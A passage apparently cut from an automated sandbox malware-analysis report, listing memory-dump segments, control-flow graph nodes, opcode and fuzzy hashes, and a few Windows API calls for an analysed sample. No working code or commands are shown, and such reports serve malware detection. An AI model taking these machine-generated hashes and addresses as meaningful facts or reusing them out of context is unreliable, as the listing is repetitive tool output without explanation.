                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 59361bfd83f084b68bf83b60c0d59c4f97376b67d5e54aa7717fd3b79a26aa46
                                                  • Instruction ID: e96e74e0bbd611048f7180db570d30714145a1cd1fe83771df66f09ff82ba255
                                                  • Opcode Fuzzy Hash: 59361bfd83f084b68bf83b60c0d59c4f97376b67d5e54aa7717fd3b79a26aa46
                                                  • Instruction Fuzzy Hash: 44716B74200B40DFD724CFA1E894B27B7FAFF89315F108969E9568B662D731E816CB50

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 483 aad110-aad11b call ae4cc0 486 aad2ee-aad2f6 483->486 487 aad121-aad130 call adc8d0 483->487 492 aad2e9 call ae56e0 487->492 493 aad136-aad15f 487->493 492->486 497 aad161 493->497 498 aad196-aad1bf 493->498 501 aad170-aad194 call aad300 497->501 499 aad1c1 498->499 500 aad1f6-aad20c 498->500 502 aad1d0-aad1f4 call aad370 499->502 503 aad239-aad23b 500->503 504 aad20e-aad20f 500->504 501->498 502->500 508 aad23d-aad25a 503->508 509 aad286-aad2aa 503->509 507 aad210-aad237 call aad3e0 504->507 507->503 508->509 515 aad25c-aad25f 508->515 511 aad2ac-aad2af 509->511 512 aad2d6-aad2dd call aae8f0 509->512 516 aad2b0-aad2d4 call aad490 511->516 512->492 524 aad2df call ab2f10 512->524 519 aad260-aad284 call aad440 515->519 516->512 519->509 527 aad2e4 call ab0b40 524->527 527->492
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 4fdd580cb0d936c2005e6406d665843482bae2d601d78ff3c98d13075bc783f8
                                                  • Instruction ID: 3180595159d00c9b68ce7be301fbb98971db2c706ad7019217144f425715e475
                                                  • Opcode Fuzzy Hash: 4fdd580cb0d936c2005e6406d665843482bae2d601d78ff3c98d13075bc783f8
                                                  • Instruction Fuzzy Hash: 2641427440D380ABC701AB68D284A2EFBF5AF97704F148C1CE5C59B692C33AD814DB67

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 529 ae99d0-ae99f3 530 ae9a2b-ae9a3b 529->530 531 ae99f5 529->531 532 ae9a8c-ae9a95 530->532 533 ae9a3d-ae9a4f 530->533 534 ae9a00-ae9a29 call aeae40 531->534 536 ae9a9b-ae9ab5 532->536 537 ae9b36-ae9b38 532->537 535 ae9a50-ae9a58 533->535 534->530 539 ae9a5a-ae9a5d 535->539 540 ae9a61-ae9a67 535->540 541 ae9ae6-ae9af2 536->541 542 ae9ab7 536->542 543 ae9b3a-ae9b41 537->543 544 ae9b49-ae9b50 537->544 539->535 546 ae9a5f 539->546 540->532 547 ae9a69-ae9a84 call ae5bb0 540->547 551 ae9b2e-ae9b30 541->551 552 ae9af4-ae9aff 541->552 548 ae9ac0-ae9ae4 call aeae40 542->548 549 ae9b47 543->549 550 ae9b43 543->550 546->532 559 ae9a89 547->559 548->541 549->544 550->549 551->537 555 ae9b32 551->555 553 ae9b00-ae9b07 552->553 557 ae9b09-ae9b0c 553->557 558 ae9b10-ae9b16 553->558 555->537 557->553 561 ae9b0e 557->561 558->551 562 ae9b18-ae9b2b call ae5bb0 558->562 559->532 561->551 562->551
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: b9eff71ab1bf47cd8ebb81cc03ba349e70a7abc58f68f4050946515bd9134bd5
                                                  • Instruction ID: cb754e59e3b0ba6ce97dd06d3cd0de2fe329f8dbb16c22dc742b9194a939557c
                                                  • Opcode Fuzzy Hash: b9eff71ab1bf47cd8ebb81cc03ba349e70a7abc58f68f4050946515bd9134bd5
                                                  • Instruction Fuzzy Hash: A0418274608380AFD714DB56D990B2BB7F6EF85754F54882CF58597251D331EC02CB52
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                  • Instruction ID: 6f40a96d66e927e934bf989b4057074d181aae96f6c787d598269bc88de8229e
                                                  • Opcode Fuzzy Hash: 49cbf2ed76a800fa5fc6030ff0b6c9ff89f1af1789fe71090c89ca86ff5befe9
                                                  • Instruction Fuzzy Hash: 12210B3250C3904FC7195E2A989062FB7E2DBC5310F1A863EE9A68F381D5758DC09392

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 340 ae3220-ae322f 341 ae32ac-ae32b0 340->341 342 ae3236-ae3252 340->342 343 ae32a2-ae32a6 RtlFreeHeap 340->343 344 ae32a0 340->344 345 ae3286-ae3296 342->345 346 ae3254 342->346 343->341 344->343 345->344 347 ae3260-ae3284 call ae5af0 346->347 347->345
                                                  APIs
                                                  • RtlFreeHeap.NTDLL(?,00000000), ref: 00AE32A6
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598042941.0000000000C7C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598062270.0000000000C7E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C7F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598082185.0000000000C89000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598128502.0000000000C9B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598147810.0000000000C9C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598171962.0000000000CBA000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598189917.0000000000CBB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598208919.0000000000CC4000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598229024.0000000000CCB000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598247978.0000000000CCC000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598265436.0000000000CCE000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598289700.0000000000CE6000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598313341.0000000000CEC000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598335517.0000000000CED000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598356122.0000000000CF2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598383974.0000000000CFE000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598409199.0000000000D02000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598432836.0000000000D0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598451228.0000000000D0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598473270.0000000000D0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598495704.0000000000D0F000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598517109.0000000000D18000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598546589.0000000000D21000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598567355.0000000000D28000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598587569.0000000000D2C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598608851.0000000000D3B000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D3C000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598628933.0000000000D6B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598688052.0000000000D80000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598714683.0000000000D81000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598738737.0000000000D95000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D96000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598761650.0000000000D9D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598804140.0000000000DAA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598822652.0000000000DAB000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_4_2_aa0000_file.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 3327a40e94410e7b4d9d8f995800792e459f800f887161cd8cd7bb071df844c1
                                                  • Instruction ID: a879fbbd7da57a264ae810a53187de408058abad638bd0d5c8976a5cf1edcf61
                                                  • Opcode Fuzzy Hash: 3327a40e94410e7b4d9d8f995800792e459f800f887161cd8cd7bb071df844c1
                                                  • Instruction Fuzzy Hash: B0016D3550D280DBC711EF98E849A2ABBE8EF5A700F05491CE5C58B361D335DD60DBA2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 350 ae5bb0-ae5be2 LdrInitializeThunk
                                                  APIs
                                                  • LdrInitializeThunk.NTDLL(00AE98C0,005C003F,00000002,00000018,?), ref: 00AE5BDE
                                                  Memory Dump Source
                                                  • Source File: 00000004.00000002.1597637392.0000000000AA1000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AA0000, based on PE: true
                                                  • Associated: 00000004.00000002.1597615087.0000000000AA0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597686844.0000000000B00000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597708942.0000000000B0A000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597730009.0000000000B0B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597750356.0000000000B0C000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1597989405.0000000000C6A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                  • Associated: 00000004.00000002.1598012014.0000000000C6C000.00000080.00000001.01000000.00000004.sdmpDownload File
